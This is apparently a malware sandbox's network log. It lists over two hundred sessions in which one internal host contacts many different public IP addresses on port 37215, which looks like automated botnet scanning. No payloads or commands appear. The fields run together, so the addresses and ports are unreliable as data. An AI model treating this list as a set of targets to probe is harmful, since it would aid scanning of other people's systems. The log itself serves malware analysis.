                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15773192.168.2.1550392190.109.53.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15774192.168.2.1535976157.238.220.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15775192.168.2.1557388197.130.59.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15776192.168.2.1535776222.167.184.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15777192.168.2.154225245.20.84.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15778192.168.2.154802437.130.172.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15779192.168.2.1538022102.40.61.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15780192.168.2.155638483.116.241.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15781192.168.2.1559284102.55.135.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15782192.168.2.1534782157.245.226.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15783192.168.2.154647494.104.202.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15784192.168.2.155943245.224.107.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15785192.168.2.1541942102.29.209.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15786192.168.2.1550812122.87.60.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15787192.168.2.1536380157.41.238.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15788192.168.2.1552806197.164.184.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15789192.168.2.155616837.230.36.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15790192.168.2.1557232157.147.93.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15791192.168.2.1536582181.182.55.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15792192.168.2.153778837.244.19.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15793192.168.2.1548686186.93.224.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15794192.168.2.1558012157.138.189.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15795192.168.2.1537080190.237.84.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15796192.168.2.154811831.115.155.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15797192.168.2.1540458181.113.12.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15798192.168.2.1556016181.249.108.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15799192.168.2.1547270138.224.152.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15800192.168.2.1556048190.159.197.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15801192.168.2.155792059.62.200.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15802192.168.2.1546574181.130.91.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15803192.168.2.1551956197.33.17.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15804192.168.2.1556070190.92.144.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15805192.168.2.153879637.57.197.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15806192.168.2.1533400190.81.37.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15807192.168.2.1537376122.134.244.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15808192.168.2.154913431.153.9.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15809192.168.2.155412878.237.42.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15810192.168.2.1546010197.96.151.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15811192.168.2.1545130190.87.222.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15812192.168.2.1536148102.11.136.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15813192.168.2.1536508190.166.210.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15814192.168.2.1534830222.129.125.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15815192.168.2.156011431.186.101.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15816192.168.2.155533241.191.245.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15817192.168.2.154785694.196.255.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15818192.168.2.1542872121.10.196.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15819192.168.2.1559454186.232.81.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15820192.168.2.1538124197.234.197.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15821192.168.2.1542948156.250.202.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15822192.168.2.154243645.107.122.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15823192.168.2.155633841.239.94.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15824192.168.2.154824241.87.7.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15825192.168.2.1556444121.237.72.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15826192.168.2.1550022156.131.208.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15827192.168.2.1540092138.108.227.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15828192.168.2.153279645.193.232.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15829192.168.2.155534437.115.99.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15830192.168.2.1544680121.103.253.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15831192.168.2.1558470157.32.153.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15832192.168.2.155317631.214.26.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15833192.168.2.1556264121.221.68.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15834192.168.2.154778831.254.106.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15835192.168.2.154500037.200.189.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15836192.168.2.1536150138.42.76.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15837192.168.2.1552848186.162.1.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15838192.168.2.1534836102.73.130.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15839192.168.2.155298645.150.103.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15840192.168.2.154744292.33.194.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15841192.168.2.1545636121.101.7.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15842192.168.2.1537030102.69.97.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15843192.168.2.155525694.159.34.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15844192.168.2.154597631.205.180.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15845192.168.2.1544150121.231.67.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15846192.168.2.1553916222.14.95.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15847192.168.2.1536312156.65.39.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15848192.168.2.1544330222.13.98.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15849192.168.2.1555574181.243.162.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15850192.168.2.153346232.20.99.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15851192.168.2.1543512138.183.119.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15852192.168.2.153441041.4.249.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15853192.168.2.155806845.60.145.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15854192.168.2.1551544186.246.35.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15855192.168.2.1536616115.145.151.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15856192.168.2.1555834197.58.137.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15857192.168.2.156054841.204.73.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15858192.168.2.1538688190.79.208.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15859192.168.2.1554916197.241.167.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15860192.168.2.1556024186.67.28.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15861192.168.2.154868631.186.126.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15862192.168.2.1558568181.155.91.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15863192.168.2.1534974132.126.184.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15864192.168.2.153971837.213.233.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15865192.168.2.1552756186.163.235.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15866192.168.2.156014837.255.55.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15867192.168.2.1533636121.28.21.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15868192.168.2.1543834222.160.130.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15869192.168.2.154063294.242.189.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15870192.168.2.1535922138.102.193.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15871192.168.2.1545092156.85.223.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15872192.168.2.1538596222.157.92.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15873192.168.2.154468041.128.168.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15874192.168.2.155656637.202.189.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15875192.168.2.1547998121.168.218.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15876192.168.2.1546898186.213.31.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15877192.168.2.154614094.106.73.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15878192.168.2.1542550102.133.141.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15879192.168.2.1558650186.120.140.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15880192.168.2.1538154190.18.245.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15881192.168.2.1556190186.181.143.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15882192.168.2.153582641.4.218.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15883192.168.2.153649841.162.237.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15884192.168.2.155016441.155.70.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15885192.168.2.1559458102.58.151.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15886192.168.2.1559388102.132.144.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15887192.168.2.1560586181.179.14.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15888192.168.2.1557366186.219.21.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15889192.168.2.1543564151.15.155.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15890192.168.2.1558058157.226.195.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15891192.168.2.1545588157.54.112.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15892192.168.2.1553342157.250.134.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15893192.168.2.1555538102.80.139.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15894192.168.2.1534866186.37.39.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15895192.168.2.1554054121.43.148.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15896192.168.2.1551620190.62.201.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15897192.168.2.1542462181.204.25.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15898192.168.2.1532886122.7.158.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15899192.168.2.1540756222.178.122.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15900192.168.2.1541496181.212.104.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15901192.168.2.1548602204.220.138.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15902192.168.2.154912494.72.32.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15903192.168.2.1557944190.221.33.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15904192.168.2.1544876190.105.240.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15905192.168.2.1543976156.36.230.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15906192.168.2.1552384186.53.105.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15907192.168.2.1549416197.104.59.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15908192.168.2.1552906100.31.210.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15909192.168.2.1555852222.65.41.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15910192.168.2.153734637.27.70.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15911192.168.2.1552676156.232.117.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15912192.168.2.1546606190.243.229.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15913192.168.2.1549798122.255.157.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15914192.168.2.154123237.126.118.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15915192.168.2.154462645.39.149.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15916192.168.2.1540000157.194.8.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15917192.168.2.1560850102.184.210.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15918192.168.2.1535262181.227.252.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15919192.168.2.1553240112.6.6.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15920192.168.2.154357631.54.97.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15921192.168.2.1536992157.244.47.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15922192.168.2.1552014186.251.151.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15923192.168.2.1552698181.241.119.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15924192.168.2.1544222157.27.105.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15925192.168.2.1549000102.216.78.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15926192.168.2.1546178222.95.2.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15927192.168.2.1538636121.212.44.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15928192.168.2.1551676156.92.64.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15929192.168.2.1553404186.41.75.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15930192.168.2.1540974157.226.23.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15931192.168.2.1553060121.163.110.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15932192.168.2.1545490122.109.60.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15933192.168.2.155628041.82.91.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15934192.168.2.153814837.128.53.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15935192.168.2.1553262222.148.118.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15936192.168.2.1553444156.37.50.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15937192.168.2.154838494.211.20.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15938192.168.2.153367441.101.21.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15939192.168.2.1540374222.87.30.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15940192.168.2.1560310102.224.80.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15941192.168.2.1539466197.126.51.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15942192.168.2.1553482181.48.126.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15943192.168.2.154189241.126.112.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15944192.168.2.1549284138.241.66.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15945192.168.2.1535232222.13.31.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15946192.168.2.1559698210.30.14.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15947192.168.2.1541784186.125.89.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15948192.168.2.155164445.142.173.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15949192.168.2.154864045.34.252.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15950192.168.2.1550974102.59.84.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15951192.168.2.1546174197.112.238.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15952192.168.2.1552828222.170.53.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15953192.168.2.1543922156.130.83.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15954192.168.2.154814038.159.190.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15955192.168.2.1554806138.58.149.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15956192.168.2.155136845.37.92.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15957192.168.2.1559686157.196.168.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15958192.168.2.155121031.151.55.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15959192.168.2.1544268122.147.251.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15960192.168.2.1551626102.178.133.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15961192.168.2.1549714102.39.95.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15962192.168.2.1535470156.141.98.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15963192.168.2.1537174156.217.217.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15964192.168.2.1554562190.206.225.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15965192.168.2.153276841.147.29.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15966192.168.2.155923241.0.100.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15967192.168.2.153723045.169.152.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15968192.168.2.154904245.82.107.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15969192.168.2.155792641.221.225.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15970192.168.2.1540344138.74.77.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15971192.168.2.1548238157.58.169.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15972192.168.2.1536474138.127.216.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15973192.168.2.154647294.55.238.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15974192.168.2.1554602190.77.208.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15975192.168.2.1541952121.224.115.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15976192.168.2.1537946181.110.59.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15977192.168.2.1536520157.149.175.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15978192.168.2.154499837.251.224.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15979192.168.2.1559464190.2.29.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15980192.168.2.1554128197.87.48.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15981192.168.2.1544960222.201.216.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15982192.168.2.1550308121.14.99.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15983192.168.2.1547092148.107.81.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15984192.168.2.156040845.214.75.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15985192.168.2.1538350181.202.254.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15986192.168.2.155583837.98.66.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15987192.168.2.1542426222.150.76.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15988192.168.2.155136845.133.115.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15989192.168.2.1535700121.225.222.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15990192.168.2.1547080156.97.177.5937215
                                              TimestampBytes transferredDirectionData


